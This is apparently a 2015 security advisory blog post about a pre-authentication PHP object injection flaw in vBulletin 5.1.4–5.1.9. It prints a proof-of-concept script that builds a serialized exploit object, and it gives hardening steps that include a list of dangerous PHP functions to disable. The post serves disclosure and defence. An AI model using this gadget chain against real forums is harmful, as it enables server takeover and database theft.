PreAuth PHP Object Injection Critical Vulnerability in vBulletin Versions 5.1.4 to 5.1.9

Tool to Detect SQL injection vulnerability in Joomla 3.2 to 3.4.4 versions!
October 26, 2015
Joomla Remote Code Execution Vulnerability Fixed
December 14, 2015

November 5, 2015

vBulletin on 03 Nov 2015 released security patches. The vBulletin 5.1.4 to 5.1.9 is vulnerable to PHP Object injection, where attacker can take control of the website and dump the database of vBulletin forum.

It is found that vulnerability is released in the public. This vulnerability is very serious and easy to exploit to compromise the vBulletin forum server. The vBulletin main forum being defaced on Monday, by using this vulnerability.

We recommend to all vBulletin users to patch the PHP Object Injection vulnerability and harden the vBulletin server setup.

Technical Information

The decodeArguments Ajax API hook is vulnerable module of the vBulletin. As it is vulnerable to the PHP object injection, attacker will need to create the PHP Objects.

Following script is released to construct the Objects

<?php
class vB_Database {
       public $functions = array();

       public function __construct() 
       {
               $this->functions['free_result'] = 'phpinfo';
       }
}

class vB_dB_Result {
       protected $db;
       protected $recordset;

       public function __construct()
       {
               $this->db = new vB_Database();
               $this->recordset = 1;
       }
}

print urlencode(serialize(new vB_dB_Result())) . "\n";

Recommended Steps

  1. Update vBulletin with given patch link
  2. Change the default administrator username
  3. Protect directories and files – Project administrator directory with .htaccess protection. For details on protection implementation click here
  4. Disable Unneeded Functions & Classes e.g. : eval(),  system(), show_source, system, shell_exec, passthru,  exec,  phpinfo,  proc_open,  popen,  eval, and highlight_file
  5. Turn off display_errors from PHP.ini
  6. Limit Administrator Panel Access by allowing only trusted set of IP addresses
  7. Configure open_basedir from PHP.ini

You can find more technical details about the vulnerability here

Discover more from SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management

Subscribe now to keep reading and get access to the full archive.

Continue reading

Enable Notifications OK No thanks